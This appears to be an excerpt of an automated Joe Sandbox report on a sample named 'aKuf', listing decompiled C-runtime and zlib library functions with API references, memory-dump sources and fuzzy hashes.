Part of subcall function 0058BAB4: __NMSG_WRITE.LIBCMT ref: 0058BADE

_malloc.LIBCMT ref: 00585AA9
_malloc.LIBCMT ref: 00585B6D
_malloc.LIBCMT ref: 00585B97

Strings

1.2.3, xrefs: 00585B53, 00585B9E

Memory Dump Source

Source File: 00000002.00000002.337934822.0000000000580000.00000040.00001000.00020000.00000000.sdmp, Offset: 00580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_580000_aKuf.jbxd

Yara matches

Similarity

API ID: _malloc
String ID: 1.2.3
API String ID: 1579825452-2310465506
Opcode ID: 7bb03aca1fc5991893fbdddb05e44545bf6cb9a06a6e9765b2a21d01904c984c
Instruction ID: 42ce13c7f35497f4fd8e4d8902b23385a36ed78c60cb94dfecfe5cb793d1b338
Opcode Fuzzy Hash: 7bb03aca1fc5991893fbdddb05e44545bf6cb9a06a6e9765b2a21d01904c984c
Instruction Fuzzy Hash: C9611670944B818FD730BF298881666FFE0FB95311F544D2EE9C6A3600E775D84ACB52

Uniqueness

Uniqueness Score: -1.00%

Function 004057B0 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 205
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E004057B0(intOrPtr* __eax) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t57;
				char* _t60;
				char _t62;
				intOrPtr _t63;
				char _t64;
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t67;
				intOrPtr _t69;
				intOrPtr _t70;
				intOrPtr _t74;
				intOrPtr _t79;
				intOrPtr _t82;
				intOrPtr* _t83;
				void* _t86;
				char* _t88;
				char* _t89;
				intOrPtr* _t91;
				intOrPtr* _t93;
				signed int _t97;
				signed int _t98;
				void* _t100;
				void* _t101;
				void* _t102;
				void* _t103;
				void* _t104;

				_t98 = _t97 | 0xffffffff;
				 *((intOrPtr*)(_t100 + 0xc)) = 0;
				_t91 = __eax;
				 *((intOrPtr*)(_t100 + 0x10)) = _t100 + 0x10;
				if( *((intOrPtr*)(_t100 + 0x68)) == 0 || __eax == 0) {
					__eflags = 0;
					return 0;
				} else {
					_t93 = E0040B84D(0, _t86, __eax, 0x74);
					_t101 = _t100 + 4;
					if(_t93 == 0) {
						L31:
						return 0;
					} else {
						 *((intOrPtr*)(_t93 + 0x20)) = 0;
						 *((intOrPtr*)(_t93 + 0x24)) = 0;
						 *((intOrPtr*)(_t93 + 0x28)) = 0;
						 *((intOrPtr*)(_t93 + 0x44)) = 0;
						 *_t93 = 0;
						 *((intOrPtr*)(_t93 + 0x48)) = 0;
						 *((intOrPtr*)(_t93 + 0xc)) = 0;
						 *((intOrPtr*)(_t93 + 0x10)) = 0;
						 *((intOrPtr*)(_t93 + 4)) = 0;
						 *((intOrPtr*)(_t93 + 0x40)) = 0;
						 *((intOrPtr*)(_t93 + 0x38)) = 0;
						 *((intOrPtr*)(_t93 + 0x3c)) = 0;
						 *((intOrPtr*)(_t93 + 0x64)) = 0;
						 *((intOrPtr*)(_t93 + 0x68)) = 0;
						 *(_t93 + 0x6c) = _t98;
						 *((intOrPtr*)(_t93 + 0x4c)) = E00403080(0, 0, 0);
						_t57 =  *((intOrPtr*)(_t101 + 0x78));
						_t102 = _t101 + 0xc;
						 *((intOrPtr*)(_t93 + 0x50)) = 0;
						 *((intOrPtr*)(_t93 + 0x58)) = 0;
						_t87 = _t57 + 1;
						do {
							_t82 =  *_t57;
							_t57 = _t57 + 1;
						} while (_t82 != 0);
						_t60 = E0040B84D(0, _t87, _t91, _t57 - _t87 + 1);
						_t103 = _t102 + 4;
						 *((intOrPtr*)(_t93 + 0x54)) = _t60;
						if(_t60 == 0) {
							L30:
							E00405160(0, _t87, _t93);
							goto L31;
						} else {
							_t83 =  *((intOrPtr*)(_t103 + 0x6c));
							_t88 = _t60;
							goto L7;
							L9:
							L9:
							if( *_t91 == 0x72) {
								 *((char*)(_t93 + 0x5c)) = 0x72;
							}
							_t63 =  *_t91;
							if(_t63 == 0x77 || _t63 == 0x61) {
								 *((char*)(_t93 + 0x5c)) = 0x77;
							}
							_t64 =  *_t91;
							if(_t64 < 0x30 || _t64 > 0x39) {
								__eflags = _t64 - 0x66;
								if(_t64 != 0x66) {
									__eflags = _t64 - 0x68;
									if(_t64 != 0x68) {
										__eflags = _t64 - 0x52;
										if(_t64 != 0x52) {
											_t89 =  *((intOrPtr*)(_t103 + 0x14));
											 *_t89 = _t64;
											_t87 = _t89 + 1;
											__eflags = _t87;
											 *((intOrPtr*)(_t103 + 0x14)) = _t87;
										} else {
											 *((intOrPtr*)(_t103 + 0x10)) = 3;
										}
									} else {
										 *((intOrPtr*)(_t103 + 0x10)) = 2;
									}
								} else {
									 *((intOrPtr*)(_t103 + 0x10)) = 1;
								}
							} else {
								_t98 = _t64 - 0x30;
							}
							_t91 = _t91 + 1;
							if(_t64 == 0) {
								goto L26;
							}
							_t87 = _t103 + 0x68;
							if( *((intOrPtr*)(_t103 + 0x14)) != _t103 + 0x68) {
								goto L9;
							}
							L26:
							_t65 =  *((intOrPtr*)(_t93 + 0x5c));
							if(_t65 == 0) {
								goto L30;
							} else {
								if(_t65 != 0x77) {
									_t66 = E0040B84D(0, _t87, _t91, 0x4000);
									 *((intOrPtr*)(_t93 + 0x44)) = _t66;
									 *_t93 = _t66;
									_t67 = E004071A0(_t93, 0xfffffff1, "1.2.3", 0x38);
									_t104 = _t103 + 0x14;
									__eflags = _t67;
									if(_t67 != 0) {
										goto L30;
									} else {
										__eflags =  *((intOrPtr*)(_t93 + 0x44));
										if(__eflags == 0) {
											goto L30;
										} else {
											goto L34;
										}
									}
								} else {
									_push(0x38);
									_push("1.2.3");
									_push( *((intOrPtr*)(_t103 + 0x10)));
									_push(8);
									_push(0xfffffff1);
									_push(8);
									_push(_t98);
									_push(_t93);
									_t91 = E00404CE0();
									_t79 = E0040B84D(0, _t87, _t91, 0x4000);
									_t104 = _t103 + 0x24;
									 *((intOrPtr*)(_t93 + 0x48)) = _t79;
									 *((intOrPtr*)(_t93 + 0xc)) = _t79;
									if(_t91 != 0 || _t79 == 0) {
										goto L30;
									} else {
										L34:
										 *((intOrPtr*)(_t93 + 0x10)) = 0x4000;
										 *((intOrPtr*)(E0040BFC1(__eflags))) = 0;
										_t69 =  *((intOrPtr*)(_t104 + 0x70));
										__eflags = _t69;
										_push(_t104 + 0x18);
										if(__eflags >= 0) {
											_push(_t69);
											_t70 = E0040C953(0, _t87, _t91, _t93, __eflags);
										} else {
											_t87 =  *((intOrPtr*)(_t104 + 0x70));
											_push( *((intOrPtr*)(_t104 + 0x70)));
											_t70 = E0040CB9D();
										}
										 *((intOrPtr*)(_t93 + 0x40)) = _t70;
										__eflags = _t70;
										if(_t70 == 0) {
											goto L30;
										} else {
											__eflags =  *((char*)(_t93 + 0x5c)) - 0x77;
											if( *((char*)(_t93 + 0x5c)) != 0x77) {
												E00405000(_t93, 0);
												_push( *((intOrPtr*)(_t93 + 0x40)));
												_t74 = E0040C8E5(0,  *((intOrPtr*)(_t93 + 0x40)), _t91, _t93, __eflags) -  *((intOrPtr*)(_t93 + 4));
												__eflags = _t74;
												 *((intOrPtr*)(_t93 + 0x60)) = _t74;
												return _t93;
											} else {
												 *((intOrPtr*)(_t93 + 0x60)) = 0xa;
												return _t93;
											}
										}
									}
								}
							}
							goto L42;
							L7:
							_t62 =  *_t83;
							 *_t88 = _t62;
							_t83 = _t83 + 1;
							_t88 = _t88 + 1;
							if(_t62 != 0) {
								goto L7;
							} else {
								 *((char*)(_t93 + 0x5c)) = 0;
							}
							goto L9;
						}
					}
				}
				L42:
			}

0x004057b7
0x004057bf
0x004057c3
0x004057c5
0x004057cd
0x004059c8
0x004059ce
0x004057db
0x004057e3
0x004057e5
0x004057ea
0x00405921
0x0040592a
0x004057f0
0x004057f3
0x004057f6
0x004057f9
0x004057fc
0x004057ff
0x00405801
0x00405804
0x00405807
0x0040580a
0x0040580d
0x00405810
0x00405813
0x00405816
0x00405819
0x0040581c
0x00405824
0x00405827
0x0040582b
0x0040582e
0x00405831
0x00405834
0x00405837
0x00405837
0x00405839
0x0040583a
0x00405842
0x00405847
0x0040584a
0x0040584f
0x0040591c
0x0040591c
0x00000000
0x00405855
0x00405855
0x00405859
0x0040585b
0x00000000
0x00405870
0x00405872
0x00405874
0x00405874
0x00405877
0x0040587b
0x00405881
0x00405881
0x00405885
0x00405889
0x00405897
0x00405899
0x004058a5
0x004058a7
0x004058b3
0x004058b5
0x004058c1
0x004058c5
0x004058c7
0x004058c7
0x004058c8
0x004058b7
0x004058b7
0x004058b7
0x004058a9
0x004058a9
0x004058a9
0x0040589b
0x0040589b
0x0040589b
0x0040588f
0x00405892
0x00405892
0x004058cc
0x004058cf
0x00000000
0x00000000
0x004058d1
0x004058d9
0x00000000
0x00000000
0x004058db
0x004058db
0x004058e0
0x00000000
0x004058e2
0x004058e4
0x00405930
0x0040593f
0x00405942
0x00405944
0x00405949
0x0040594c
0x0040594e
0x00000000
0x00405950
0x00405950
0x00405953
0x00000000
0x00000000
0x00000000
0x00000000
0x00405953
0x004058e6
0x004058ea
0x004058ec
0x004058f1
0x004058f2
0x004058f4
0x004058f6
0x004058f8
0x004058f9
0x00405904
0x00405906
0x0040590b
0x0040590e
0x00405911
0x00405916
0x00000000
0x00405955
0x00405955
0x00405955
0x00405961
0x00405963
0x00405967
0x0040596d
0x0040596e
0x0040597c
0x0040597d
0x00405970
0x00405970
0x00405974
0x00405975
0x00405975
0x00405985
0x00405988
0x0040598a
0x00000000
0x0040598c
0x0040598c
0x00405990
0x004059a5
0x004059ad
0x004059b6
0x004059b6
0x004059b9
0x004059c5
0x00405992
0x00405992
0x004059a2
0x004059a2
0x00405990
0x0040598a
0x00405916
0x004058e4
0x00000000
0x00405860
0x00405860
0x00405862
0x00405864
0x00405865
0x00405868
0x00000000
0x0040586a
0x0040586a
0x0040586d
0x00000000
0x00405868
0x0040584f
0x004057ea
0x00000000

APIs

_malloc.LIBCMT ref: 004057DE

Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4

_malloc.LIBCMT ref: 00405842
_malloc.LIBCMT ref: 00405906
_malloc.LIBCMT ref: 00405930

Strings

1.2.3, xrefs: 004058EC, 00405937

Memory Dump Source

Source File: 00000002.00000002.337856885.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.337856885.0000000000426000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.337856885.000000000042F000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aKuf.jbxd

Yara matches

Similarity

API ID: _malloc$AllocateHeap
String ID: 1.2.3
API String ID: 680241177-2310465506
Opcode ID: dcd0ffeba55ff02fe10acfaeba0fa9d55be123b2b31187241ea46178cf7d6550
Instruction ID: 6f54ea0e5a0cddcbb7a6eab5c61130b8c10e9e343dc86a4c4a61a5a67c51a18e
Opcode Fuzzy Hash: dcd0ffeba55ff02fe10acfaeba0fa9d55be123b2b31187241ea46178cf7d6550
Instruction Fuzzy Hash: 8B61F7B1944B408FD720AF2A888066BBBE0FB45314F548D3FE5D5A3781D739D8498F5A

Uniqueness

Uniqueness Score: -1.00%

Function 0058BF29 Relevance: 10.7, APIs: 7, Instructions: 189COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 0058BF8B
_memcpy_s.LIBCMT ref: 0058C000
__fileno.LIBCMT ref: 0058C060
__read.LIBCMT ref: 0058C067
__filbuf.LIBCMT ref: 0058C08B
_memset.LIBCMT ref: 0058C0D1
_memset.LIBCMT ref: 0058C0FC

Part of subcall function 0058C228: __getptd_noexit.LIBCMT ref: 0058C228

Memory Dump Source

Source File: 00000002.00000002.337934822.0000000000580000.00000040.00001000.00020000.00000000.sdmp, Offset: 00580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_580000_aKuf.jbxd

Yara matches

Similarity

API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
String ID:
API String ID: 3886058894-0
Opcode ID: c8cdba87b669e5a45588b0eb276f39e335abb1b1e80ab099951c299220f7b7ba
Instruction ID: 00ecde219fa94e55876315f06804470b1c0782ed17430af0db537ec37d08a267
Opcode Fuzzy Hash: c8cdba87b669e5a45588b0eb276f39e335abb1b1e80ab099951c299220f7b7ba
Instruction Fuzzy Hash: A951C671900209EBDB20BF698C8959EBFB9FF81360F248629FC25B6191D7719E50CF60

Uniqueness

Uniqueness Score: -1.00%

Function 0040BCC2 Relevance: 10.7, APIs: 7, Instructions: 189
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 85%

			E0040BCC2(signed int __edx, char* _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20) {
				signed int _v8;
				char* _v12;
				signed int _v16;
				signed int _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t90;
				intOrPtr* _t92;
				signed int _t94;
				char _t97;
				signed int _t105;
				void* _t106;
				signed int _t107;
				signed int _t110;
				signed int _t113;
				intOrPtr* _t114;
				signed int _t118;
				signed int _t119;
				signed int _t120;
				char* _t121;
				signed int _t125;
				signed int _t131;
				signed int _t133;
				void* _t134;

				_t125 = __edx;
				_t121 = _a4;
				_t119 = _a8;
				_t131 = 0;
				_v12 = _t121;
				_v8 = _t119;
				if(_a12 == 0 || _a16 == 0) {
					L5:
					return 0;
				} else {
					_t138 = _t121;
					if(_t121 != 0) {
						_t133 = _a20;
						__eflags = _t133;
						if(_t133 == 0) {
							L9:
							__eflags = _t119 - 0xffffffff;
							if(_t119 != 0xffffffff) {
								_t90 = E0040BA30(_t131, _t121, _t131, _t119);
								_t134 = _t134 + 0xc;
							}
							__eflags = _t133 - _t131;
							if(__eflags == 0) {
								goto L3;
							} else {
								_t94 = _t90 | 0xffffffff;
								_t125 = _t94 % _a12;
								__eflags = _a16 - _t94 / _a12;
								if(__eflags > 0) {
									goto L3;
								}
								L13:
								_t131 = _a12 * _a16;
								__eflags =  *(_t133 + 0xc) & 0x0000010c;
								_v20 = _t131;
								_t120 = _t131;
								if(( *(_t133 + 0xc) & 0x0000010c) == 0) {
									_v16 = 0x1000;
								} else {
									_v16 =  *((intOrPtr*)(_t133 + 0x18));
								}
								__eflags = _t131;
								if(_t131 == 0) {
									L40:
									return _a16;
								} else {
									do {
										__eflags =  *(_t133 + 0xc) & 0x0000010c;
										if(( *(_t133 + 0xc) & 0x0000010c) == 0) {
											L24:
											__eflags = _t120 - _v16;
											if(_t120 < _v16) {
												_t97 = E0040FC07(_t120, _t125, _t133);
												__eflags = _t97 - 0xffffffff;
												if(_t97 == 0xffffffff) {
													L48:
													return (_t131 - _t120) / _a12;
												}
												__eflags = _v8;
												if(_v8 == 0) {
													L44:
													__eflags = _a8 - 0xffffffff;
													if(__eflags != 0) {
														E0040BA30(_t131, _a4, 0, _a8);
														_t134 = _t134 + 0xc;
													}
													 *((intOrPtr*)(E0040BFC1(__eflags))) = 0x22;
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													L4:
													E0040E744(_t125, _t131, _t133);
													goto L5;
												}
												_t123 = _v12;
												_v12 = _v12 + 1;
												 *_v12 = _t97;
												_t120 = _t120 - 1;
												_t70 =  &_v8;
												 *_t70 = _v8 - 1;
												__eflags =  *_t70;
												_v16 =  *((intOrPtr*)(_t133 + 0x18));
												goto L39;
											}
											__eflags = _v16;
											if(_v16 == 0) {
												_t105 = 0x7fffffff;
												__eflags = _t120 - 0x7fffffff;
												if(_t120 <= 0x7fffffff) {
													_t105 = _t120;
												}
											} else {
												__eflags = _t120 - 0x7fffffff;
												if(_t120 <= 0x7fffffff) {
													_t55 = _t120 % _v16;
													__eflags = _t55;
													_t125 = _t55;
													_t110 = _t120;
												} else {
													_t125 = 0x7fffffff % _v16;
													_t110 = 0x7fffffff;
												}
												_t105 = _t110 - _t125;
											}
											__eflags = _t105 - _v8;
											if(_t105 > _v8) {
												goto L44;
											} else {
												_push(_t105);
												_push(_v12);
												_t106 = E0040FA20(_t125, _t131, _t133);
												_pop(_t123);
												_push(_t106);
												_t107 = E004102F4(_t120, _t125, _t131, _t133, __eflags);
												_t134 = _t134 + 0xc;
												__eflags = _t107;
												if(_t107 == 0) {
													 *(_t133 + 0xc) =  *(_t133 + 0xc) | 0x00000010;
													goto L48;
												}
												__eflags = _t107 - 0xffffffff;
												if(_t107 == 0xffffffff) {
													L47:
													_t80 = _t133 + 0xc;
													 *_t80 =  *(_t133 + 0xc) | 0x00000020;
													__eflags =  *_t80;
													goto L48;
												}
												_v12 = _v12 + _t107;
												_t120 = _t120 - _t107;
												_v8 = _v8 - _t107;
												goto L39;
											}
										}
										_t113 =  *(_t133 + 4);
										__eflags = _t113;
										if(__eflags == 0) {
											goto L24;
										}
										if(__eflags < 0) {
											goto L47;
										}
										_t131 = _t120;
										__eflags = _t120 - _t113;
										if(_t120 >= _t113) {
											_t131 = _t113;
										}
										__eflags = _t131 - _v8;
										if(_t131 > _v8) {
											_t133 = 0;
											__eflags = _a8 - 0xffffffff;
											if(__eflags != 0) {
												E0040BA30(_t131, _a4, 0, _a8);
												_t134 = _t134 + 0xc;
											}
											_t114 = E0040BFC1(__eflags);
											_push(_t133);
											_push(_t133);
											_push(_t133);
											_push(_t133);
											 *_t114 = 0x22;
											_push(_t133);
											goto L4;
										} else {
											E004103F1(_t120, _t123, _t125, _v12, _v8,  *_t133, _t131);
											 *(_t133 + 4) =  *(_t133 + 4) - _t131;
											 *_t133 =  *_t133 + _t131;
											_v12 = _v12 + _t131;
											_t120 = _t120 - _t131;
											_t134 = _t134 + 0x10;
											_v8 = _v8 - _t131;
											_t131 = _v20;
										}
										L39:
										__eflags = _t120;
									} while (_t120 != 0);
									goto L40;
								}
							}
						}
						_t118 = _t90 | 0xffffffff;
						_t90 = _t118 / _a12;
						_t125 = _t118 % _a12;
						__eflags = _a16 - _t90;
						if(_a16 <= _t90) {
							goto L13;
						}
						goto L9;
					}
					L3:
					_t92 = E0040BFC1(_t138);
					_push(_t131);
					_push(_t131);
					_push(_t131);
					_push(_t131);
					 *_t92 = 0x16;
					_push(_t131);
					goto L4;
				}
			}

0x0040bcc2
0x0040bcca
0x0040bcce
0x0040bcd3
0x0040bcd5
0x0040bcd8
0x0040bcde
0x0040bd01
0x00000000
0x0040bce5
0x0040bce5
0x0040bce7
0x0040bd08
0x0040bd0b
0x0040bd0d
0x0040bd1c
0x0040bd1c
0x0040bd1f
0x0040bd24
0x0040bd29
0x0040bd29
0x0040bd2c
0x0040bd2e
0x00000000
0x0040bd30
0x0040bd30
0x0040bd35
0x0040bd38
0x0040bd3b
0x00000000
0x00000000
0x0040bd3d
0x0040bd40
0x0040bd44
0x0040bd4b
0x0040bd4e
0x0040bd50
0x0040bd5a
0x0040bd52
0x0040bd55
0x0040bd55
0x0040bd61
0x0040bd63
0x0040be53
0x00000000
0x0040bd69
0x0040bd69
0x0040bd69
0x0040bd70
0x0040bdb6
0x0040bdb6
0x0040bdb9
0x0040be24
0x0040be2a
0x0040be2d
0x0040beb8
0x00000000
0x0040bebe
0x0040be33
0x0040be37
0x0040be87
0x0040be87
0x0040be8b
0x0040be95
0x0040be9a
0x0040be9a
0x0040bea2
0x0040beaa
0x0040beab
0x0040beac
0x0040bead
0x0040beae
0x0040bcf9
0x0040bcf9
0x00000000
0x0040bcfe
0x0040be39
0x0040be3c
0x0040be3f
0x0040be44
0x0040be45
0x0040be45
0x0040be45
0x0040be48
0x00000000
0x0040be48
0x0040bdbb
0x0040bdbf
0x0040bde0
0x0040bde5
0x0040bde7
0x0040bde9
0x0040bde9
0x0040bdc1
0x0040bdc8
0x0040bdca
0x0040bdd7
0x0040bdd7
0x0040bdd7
0x0040bdda
0x0040bdcc
0x0040bdce
0x0040bdd1
0x0040bdd1
0x0040bddc
0x0040bddc
0x0040bdeb
0x0040bdee
0x00000000
0x0040bdf4
0x0040bdf4
0x0040bdf5
0x0040bdf9
0x0040bdfe
0x0040bdff
0x0040be00
0x0040be05
0x0040be08
0x0040be0a
0x0040bec6
0x00000000
0x0040bec6
0x0040be10
0x0040be13
0x0040beb4
0x0040beb4
0x0040beb4
0x0040beb4
0x00000000
0x0040beb4
0x0040be19
0x0040be1c
0x0040be1e
0x00000000
0x0040be1e
0x0040bdee
0x0040bd72
0x0040bd75
0x0040bd77
0x00000000
0x00000000
0x0040bd79
0x00000000
0x00000000
0x0040bd7f
0x0040bd81
0x0040bd83
0x0040bd85
0x0040bd85
0x0040bd87
0x0040bd8a
0x0040be5b
0x0040be5d
0x0040be61
0x0040be6a
0x0040be6f
0x0040be6f
0x0040be72
0x0040be77
0x0040be78
0x0040be79
0x0040be7a
0x0040be7b
0x0040be81
0x00000000
0x0040bd90
0x0040bd99
0x0040bd9e
0x0040bda1
0x0040bda3
0x0040bda6
0x0040bda8
0x0040bdab
0x0040bdae
0x0040bdae
0x0040be4b
0x0040be4b
0x0040be4b
0x00000000
0x0040bd69
0x0040bd63
0x0040bd2e
0x0040bd0f
0x0040bd14
0x0040bd14
0x0040bd17
0x0040bd1a
0x00000000
0x00000000
0x00000000
0x0040bd1a
0x0040bce9
0x0040bce9
0x0040bcee
0x0040bcef
0x0040bcf0
0x0040bcf1
0x0040bcf2
0x0040bcf8
0x00000000
0x0040bcf8

APIs

_memset.LIBCMT ref: 0040BD24
_memcpy_s.LIBCMT ref: 0040BD99
__fileno.LIBCMT ref: 0040BDF9
__read.LIBCMT ref: 0040BE00
__filbuf.LIBCMT ref: 0040BE24
_memset.LIBCMT ref: 0040BE6A
_memset.LIBCMT ref: 0040BE95

Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1

Memory Dump Source

Source File: 00000002.00000002.337856885.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.337856885.0000000000426000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.337856885.000000000042F000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aKuf.jbxd

Yara matches

Similarity

API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
String ID:
API String ID: 3886058894-0
Opcode ID: c8cdba87b669e5a45588b0eb276f39e335abb1b1e80ab099951c299220f7b7ba
Instruction ID: 0234425abcb0213f77efd30778ac7634d7a408156a07f93f58cd91f86a00e979
Opcode Fuzzy Hash: c8cdba87b669e5a45588b0eb276f39e335abb1b1e80ab099951c299220f7b7ba
Instruction Fuzzy Hash: 1E519031A00605ABCB209F69C844A9FBB75EF41324F24863BF825B22D1D7799E51CBDD

Uniqueness

Uniqueness Score: -1.00%

Function 0058C9A4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64COMMON

Download Yara Rule

APIs

__lock_file.LIBCMT ref: 0058C92F
__fileno.LIBCMT ref: 0058C93D
__fileno.LIBCMT ref: 0058C949
__fileno.LIBCMT ref: 0058C955
__fileno.LIBCMT ref: 0058C965

Part of subcall function 0058C228: __getptd_noexit.LIBCMT ref: 0058C228

Strings

'B, xrefs: 0058C976

Memory Dump Source

Source File: 00000002.00000002.337934822.0000000000580000.00000040.00001000.00020000.00000000.sdmp, Offset: 00580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_580000_aKuf.jbxd

Yara matches

Similarity

API ID: __fileno$__getptd_noexit__lock_file
String ID: 'B
API String ID: 3755561058-2787509829
Opcode ID: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
Instruction ID: 889eca24cfec75b96c989b514363bcf76b42a42dd34d1c855dbb43710e89cad1
Opcode Fuzzy Hash: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
Instruction Fuzzy Hash: 3701482321461956C2117B786C4B42D7FA0BECA7307254754FC74BB1D2EB38DA029765

Uniqueness

Uniqueness Score: -1.00%

Function 0059499F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 005949AB

Part of subcall function 0059099C: __getptd_noexit.LIBCMT ref: 0059099F
Part of subcall function 0059099C: __amsg_exit.LIBCMT ref: 005909AC

__getptd.LIBCMT ref: 005949C2
__amsg_exit.LIBCMT ref: 005949D0
__lock.LIBCMT ref: 005949E0

Strings

@.B, xrefs: 005949ED

Memory Dump Source

Source File: 00000002.00000002.337934822.0000000000580000.00000040.00001000.00020000.00000000.sdmp, Offset: 00580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_580000_aKuf.jbxd

Yara matches

Similarity

API ID: __amsg_exit__getptd$__getptd_noexit__lock
String ID: @.B
API String ID: 3521780317-470711618
Opcode ID: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
Instruction ID: e3ddf9210369f09b14a12ee961272f15afbfd443be20a40ee6e1e67835e454f1
Opcode Fuzzy Hash: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
Instruction Fuzzy Hash: F8F09031A407119BDF20FB64890BB6A7BB07F80720F51061AF858B72D2DB74AC02CF55

Uniqueness

Uniqueness Score: -1.00%

Function 00414738 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 31
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 90%

			E00414738(void* __ebx, void* __edx, intOrPtr __edi, void* __esi, void* __eflags) {
				signed int _t13;
				intOrPtr _t28;
				void* _t29;
				void* _t30;

				_t30 = __eflags;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ebx;
				_push(0xc);
				_push(0x4214d0);
				E0040E1D8(__ebx, __edi, __esi);
				_t28 = E00410735(__ebx, __edx, __edi, _t30);
				_t13 =  *0x422e34; // 0xfffffffe
				if(( *(_t28 + 0x70) & _t13) == 0) {
					L6:
					E0040D6E0(_t22, 0xc);
					 *(_t29 - 4) =  *(_t29 - 4) & 0x00000000;
					_t8 = _t28 + 0x6c; // 0x6c
					_t26 =  *0x422f18; // 0x422e40
					 *((intOrPtr*)(_t29 - 0x1c)) = E004146FA(_t8, _t26);
					 *(_t29 - 4) = 0xfffffffe;
					E004147A2();
				} else {
					_t32 =  *((intOrPtr*)(_t28 + 0x6c));
					if( *((intOrPtr*)(_t28 + 0x6c)) == 0) {
						goto L6;
					} else {
						_t28 =  *((intOrPtr*)(E00410735(_t22, __edx, _t26, _t32) + 0x6c));
					}
				}
				if(_t28 == 0) {
					E0040E79A(_t25, _t26, 0x20);
				}
				return E0040E21D(_t28);
			}

0x00414738
0x00414738
0x00414738
0x00414738
0x00414738
0x0041473a
0x0041473f
0x00414749
0x0041474b
0x00414753
0x00414777
0x00414779
0x0041477f
0x00414783
0x00414786
0x00414791
0x00414794
0x0041479b
0x00414755
0x00414755
0x00414759
0x00000000
0x0041475b
0x00414760
0x00414760
0x00414759
0x00414765
0x00414769
0x0041476e
0x00414776

APIs

__getptd.LIBCMT ref: 00414744

Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745

__getptd.LIBCMT ref: 0041475B
__amsg_exit.LIBCMT ref: 00414769
__lock.LIBCMT ref: 00414779

Strings

@.B, xrefs: 00414786

Memory Dump Source

Source File: 00000002.00000002.337856885.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.337856885.0000000000426000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.337856885.000000000042F000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aKuf.jbxd

Yara matches

Similarity

API ID: __amsg_exit__getptd$__getptd_noexit__lock
String ID: @.B
API String ID: 3521780317-470711618
Opcode ID: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
Instruction ID: 91aff3cf2d6bbea4e2ea5d49e8e08bf0f41c3eb50374f8394f27d7b6c467aa53
Opcode Fuzzy Hash: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
Instruction Fuzzy Hash: 60F09631A407009BE720BB66850678D73A06F81719F91456FE4646B2D1CB7C6981CA5D

Uniqueness

Uniqueness Score: -1.00%

Function 00594961 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

___addlocaleref.LIBCMT ref: 00594973
___removelocaleref.LIBCMT ref: 0059497E
___freetlocinfo.LIBCMT ref: 00594992

Part of subcall function 005946F0: ___free_lconv_mon.LIBCMT ref: 00594736
Part of subcall function 005946F0: ___free_lconv_num.LIBCMT ref: 00594757
Part of subcall function 005946F0: ___free_lc_time.LIBCMT ref: 005947DC

Strings

@.B, xrefs: 00594970
@.B, xrefs: 00594989

Memory Dump Source

Source File: 00000002.00000002.337934822.0000000000580000.00000040.00001000.00020000.00000000.sdmp, Offset: 00580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_580000_aKuf.jbxd

Yara matches

Similarity

API ID: ___addlocaleref___free_lc_time___free_lconv_mon___free_lconv_num___freetlocinfo___removelocaleref
